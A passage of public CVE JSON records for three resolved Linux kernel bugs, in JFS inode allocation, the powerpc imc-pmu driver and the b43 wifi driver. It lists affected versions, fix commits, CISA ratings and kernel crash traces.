"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5a6660139195f5e2fbbda459eeecb8788f3885fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "49f9637aafa6e63ba686c13cb8549bf5e6920402",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/jfs/jfs_imap.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\njfs: fix array-index-out-of-bounds in diNewExt\n\n[Syz report]\nUBSAN: array-index-out-of-bounds in fs/jfs/jfs_imap.c:2360:2\nindex -878706688 is out of range for type \u0027struct iagctl[128]\u0027\nCPU: 1 PID: 5065 Comm: syz-executor282 Not tainted 6.7.0-rc4-syzkaller-00009-gbee0e7762ad2 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/10/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x1e7/0x2d0 lib/dump_stack.c:106\n ubsan_epilogue lib/ubsan.c:217 [inline]\n __ubsan_handle_out_of_bounds+0x11c/0x150 lib/ubsan.c:348\n diNewExt+0x3cf3/0x4000 fs/jfs/jfs_imap.c:2360\n diAllocExt fs/jfs/jfs_imap.c:1949 [inline]\n diAllocAG+0xbe8/0x1e50 fs/jfs/jfs_imap.c:1666\n diAlloc+0x1d3/0x1760 fs/jfs/jfs_imap.c:1587\n ialloc+0x8f/0x900 fs/jfs/jfs_inode.c:56\n jfs_mkdir+0x1c5/0xb90 fs/jfs/namei.c:225\n vfs_mkdir+0x2f1/0x4b0 fs/namei.c:4106\n do_mkdirat+0x264/0x3a0 fs/namei.c:4129\n __do_sys_mkdir fs/namei.c:4149 [inline]\n __se_sys_mkdir fs/namei.c:4147 [inline]\n __x64_sys_mkdir+0x6e/0x80 fs/namei.c:4147\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x45/0x110 arch/x86/entry/common.c:82\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\nRIP: 0033:0x7fcb7e6a0b57\nCode: ff ff 77 07 31 c0 c3 0f 1f 40 00 48 c7 c2 b8 ff ff ff f7 d8 64 89 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 b8 53 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007ffd83023038 EFLAGS: 00000286 ORIG_RAX: 0000000000000053\nRAX: ffffffffffffffda RBX: 00000000ffffffff RCX: 00007fcb7e6a0b57\nRDX: 00000000000a1020 RSI: 00000000000001ff RDI: 0000000020000140\nRBP: 0000000020000140 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000286 R12: 00007ffd830230d0\nR13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n\n[Analysis]\nWhen the agstart is too large, it can cause agno overflow.\n\n[Fix]\nAfter obtaining agno, if the value is invalid, exit the subsequent process.\n\n\nModified the test from agno \u003e MAXAG to agno \u003e= MAXAG based on linux-next\nreport by kernel test robot (Dan Carpenter)."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:31.588Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f423528488e4f9606cef858eceea210bf1163f41"
},
{
"url": "https://git.kernel.org/stable/c/de6a91aed1e0b1a23e9c11e7d7557f088eeeb017"
},
{
"url": "https://git.kernel.org/stable/c/e2b77d107b33bb31c8b1f5c4cb8f277b23728f1e"
},
{
"url": "https://git.kernel.org/stable/c/6aa30020879042d46df9f747e4f0a486eea6fe98"
},
{
"url": "https://git.kernel.org/stable/c/3537f92cd22c672db97fae6997481e678ad14641"
},
{
"url": "https://git.kernel.org/stable/c/6996d43b14486f4a6655b10edc541ada1b580b4b"
},
{
"url": "https://git.kernel.org/stable/c/5a6660139195f5e2fbbda459eeecb8788f3885fe"
},
{
"url": "https://git.kernel.org/stable/c/49f9637aafa6e63ba686c13cb8549bf5e6920402"
}
],
"title": "jfs: fix array-index-out-of-bounds in diNewExt",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52599",
"datePublished": "2024-03-06T06:45:27.655Z",
"dateReserved": "2024-03-02T21:55:42.573Z",
"dateUpdated": "2025-05-04T07:39:31.588Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52675 (GCVE-0-2023-52675)
Vulnerability from cvelistv5
Published
2024-05-17 14:24
Modified
2025-05-04 07:41
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
powerpc/imc-pmu: Add a null pointer check in update_events_in_group()
kasprintf() returns a pointer to dynamically allocated memory
which can be NULL upon failure.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b Version: 885dcd709ba9120b9935415b8b0f9d1b94e5826b |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52675",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:39:04.688861Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:42:18.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:11:35.401Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/75fc599bcdcb1de093c9ced2e3cccc832f3787f3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1e80aa25d186a7aa212df5acd8c75f55ac8dae34"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a669f3511d273c8c1ab1c1d268fbcdf53fc7a05"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f105c263009839d80fad6998324a4e1b3511cba0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a2da3f9b1a1019c887ee1d164475a8fcdb0a3fec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/024352f7928b28f53609660663329d8c0f4ad032"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c7d828e12b326ea50fb80c369d7aa87519ed14c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0a233867a39078ebb0f575e2948593bbff5826b3"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"arch/powerpc/perf/imc-pmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "75fc599bcdcb1de093c9ced2e3cccc832f3787f3",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "1e80aa25d186a7aa212df5acd8c75f55ac8dae34",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "5a669f3511d273c8c1ab1c1d268fbcdf53fc7a05",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "f105c263009839d80fad6998324a4e1b3511cba0",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "a2da3f9b1a1019c887ee1d164475a8fcdb0a3fec",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "024352f7928b28f53609660663329d8c0f4ad032",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "c7d828e12b326ea50fb80c369d7aa87519ed14c6",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
},
{
"lessThan": "0a233867a39078ebb0f575e2948593bbff5826b3",
"status": "affected",
"version": "885dcd709ba9120b9935415b8b0f9d1b94e5826b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"arch/powerpc/perf/imc-pmu.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.14"
},
{
"lessThan": "4.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "4.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "4.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/imc-pmu: Add a null pointer check in update_events_in_group()\n\nkasprintf() returns a pointer to dynamically allocated memory\nwhich can be NULL upon failure."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:41:19.518Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/75fc599bcdcb1de093c9ced2e3cccc832f3787f3"
},
{
"url": "https://git.kernel.org/stable/c/1e80aa25d186a7aa212df5acd8c75f55ac8dae34"
},
{
"url": "https://git.kernel.org/stable/c/5a669f3511d273c8c1ab1c1d268fbcdf53fc7a05"
},
{
"url": "https://git.kernel.org/stable/c/f105c263009839d80fad6998324a4e1b3511cba0"
},
{
"url": "https://git.kernel.org/stable/c/a2da3f9b1a1019c887ee1d164475a8fcdb0a3fec"
},
{
"url": "https://git.kernel.org/stable/c/024352f7928b28f53609660663329d8c0f4ad032"
},
{
"url": "https://git.kernel.org/stable/c/c7d828e12b326ea50fb80c369d7aa87519ed14c6"
},
{
"url": "https://git.kernel.org/stable/c/0a233867a39078ebb0f575e2948593bbff5826b3"
}
],
"title": "powerpc/imc-pmu: Add a null pointer check in update_events_in_group()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52675",
"datePublished": "2024-05-17T14:24:40.721Z",
"dateReserved": "2024-03-07T14:49:46.886Z",
"dateUpdated": "2025-05-04T07:41:19.518Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52644 (GCVE-0-2023-52644)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 07:40
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: b43: Stop/wake correct queue in DMA Tx path when QoS is disabled
When QoS is disabled, the queue priority value will not map to the correct
ieee80211 queue since there is only one queue. Stop/wake queue 0 when QoS
is disabled to prevent trying to stop/wake a non-existent queue and failing
to stop/wake the actual queue instantiated.
Log of issue before change (with kernel parameter qos=0):
[ +5.112651] ------------[ cut here ]------------
[ +0.000005] WARNING: CPU: 7 PID: 25513 at net/mac80211/util.c:449 __ieee80211_wake_queue+0xd5/0x180 [mac80211]
[ +0.000067] Modules linked in: b43(O) snd_seq_dummy snd_hrtimer snd_seq snd_seq_device nft_chain_nat xt_MASQUERADE nf_nat xfrm_user xfrm_algo xt_addrtype overlay ccm af_packet amdgpu snd_hda_codec_cirrus snd_hda_codec_generic ledtrig_audio drm_exec amdxcp gpu_sched xt_conntrack nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip6t_rpfilter ipt_rpfilter xt_pkttype xt_LOG nf_log_syslog xt_tcpudp nft_compat nf_tables nfnetlink sch_fq_codel btusb uinput iTCO_wdt ctr btrtl intel_pmc_bxt i915 intel_rapl_msr mei_hdcp mei_pxp joydev at24 watchdog btintel atkbd libps2 serio radeon btbcm vivaldi_fmap btmtk intel_rapl_common snd_hda_codec_hdmi bluetooth uvcvideo nls_iso8859_1 applesmc nls_cp437 x86_pkg_temp_thermal snd_hda_intel intel_powerclamp vfat videobuf2_vmalloc coretemp fat snd_intel_dspcfg crc32_pclmul uvc polyval_clmulni snd_intel_sdw_acpi loop videobuf2_memops snd_hda_codec tun drm_suballoc_helper polyval_generic drm_ttm_helper drm_buddy tap ecdh_generic videobuf2_v4l2 gf128mul macvlan ttm ghash_clmulni_intel ecc tg3
[ +0.000044] videodev bridge snd_hda_core rapl crc16 drm_display_helper cec mousedev snd_hwdep evdev intel_cstate bcm5974 hid_appleir videobuf2_common stp mac_hid libphy snd_pcm drm_kms_helper acpi_als mei_me intel_uncore llc mc snd_timer intel_gtt industrialio_triggered_buffer apple_mfi_fastcharge i2c_i801 mei snd lpc_ich agpgart ptp i2c_smbus thunderbolt apple_gmux i2c_algo_bit kfifo_buf video industrialio soundcore pps_core wmi tiny_power_button sbs sbshc button ac cordic bcma mac80211 cfg80211 ssb rfkill libarc4 kvm_intel kvm drm irqbypass fuse backlight firmware_class efi_pstore configfs efivarfs dmi_sysfs ip_tables x_tables autofs4 dm_crypt cbc encrypted_keys trusted asn1_encoder tee tpm rng_core input_leds hid_apple led_class hid_generic usbhid hid sd_mod t10_pi crc64_rocksoft crc64 crc_t10dif crct10dif_generic ahci libahci libata uhci_hcd ehci_pci ehci_hcd crct10dif_pclmul crct10dif_common sha512_ssse3 sha512_generic sha256_ssse3 sha1_ssse3 aesni_intel usbcore scsi_mod libaes crypto_simd cryptd scsi_common
[ +0.000055] usb_common rtc_cmos btrfs blake2b_generic libcrc32c crc32c_generic crc32c_intel xor raid6_pq dm_snapshot dm_bufio dm_mod dax [last unloaded: b43(O)]
[ +0.000009] CPU: 7 PID: 25513 Comm: irq/17-b43 Tainted: G W O 6.6.7 #1-NixOS
[ +0.000003] Hardware name: Apple Inc. MacBookPro8,3/Mac-942459F5819B171B, BIOS 87.0.0.0.0 06/13/2019
[ +0.000001] RIP: 0010:__ieee80211_wake_queue+0xd5/0x180 [mac80211]
[ +0.000046] Code: 00 45 85 e4 0f 85 9b 00 00 00 48 8d bd 40 09 00 00 f0 48 0f ba ad 48 09 00 00 00 72 0f 5b 5d 41 5c 41 5d 41 5e e9 cb 6d 3c d0 <0f> 0b 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc 48 8d b4 16 94 00 00
[ +0.000002] RSP: 0018:ffffc90003c77d60 EFLAGS: 00010097
[ +0.000001] RAX: 0000000000000001 RBX: 0000000000000002 RCX: 0000000000000000
[ +0.000001] RDX: 0000000000000000 RSI: 0000000000000002 RDI: ffff88820b924900
[ +0.000002] RBP: ffff88820b924900 R08: ffffc90003c77d90 R09: 000000000003bfd0
[ +0.000001] R10: ffff88820b924900 R11: ffffc90003c77c68 R12: 0000000000000000
[ +0.000001] R13: 0000000000000000 R14: ffffc90003c77d90 R15: ffffffffc0fa6f40
[ +0.000001] FS: 0000000000000000(0000) GS:ffff88846fb80000(0000) knlGS:0000000000000000
[ +0.000001] CS: 0010 DS: 0
---truncated---
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e Version: e6f5b934fba8c44c87c551e066aa7ca6fde2939e |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.367Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1824f942527f784a19e01eac2d9679a21623d010"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/31aaf17200c336fe258b70d39c40645ae19d0240"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/49f067726ab01c87cf57566797a8a719badbbf08"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/04a2b6eff2ae1c19cb7f41e803bcbfaf94c06455"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c67698325c68f8768db858f5c87c34823421746d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc845e2e42cae95172c04bf29807c480f51a2a83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4049a9f80513a6739c5677736a4c88f96df1b436"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1cf77bb870046a6111a604f7f7fe83d1c8c9610"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9636951e4468f02c72cc75a82dc65d003077edbc"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52644",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:35.399948Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:27.141Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/broadcom/b43/b43.h",
"drivers/net/wireless/broadcom/b43/dma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "1824f942527f784a19e01eac2d9679a21623d010",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "31aaf17200c336fe258b70d39c40645ae19d0240",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "49f067726ab01c87cf57566797a8a719badbbf08",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "04a2b6eff2ae1c19cb7f41e803bcbfaf94c06455",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "c67698325c68f8768db858f5c87c34823421746d",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "bc845e2e42cae95172c04bf29807c480f51a2a83",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "4049a9f80513a6739c5677736a4c88f96df1b436",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "f1cf77bb870046a6111a604f7f7fe83d1c8c9610",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
},
{
"lessThan": "9636951e4468f02c72cc75a82dc65d003077edbc",
"status": "affected",
"version": "e6f5b934fba8c44c87c551e066aa7ca6fde2939e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/broadcom/b43/b43.h",
"drivers/net/wireless/broadcom/b43/dma.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.26"
},
{
"lessThan": "2.6.26",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "2.6.26",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "2.6.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
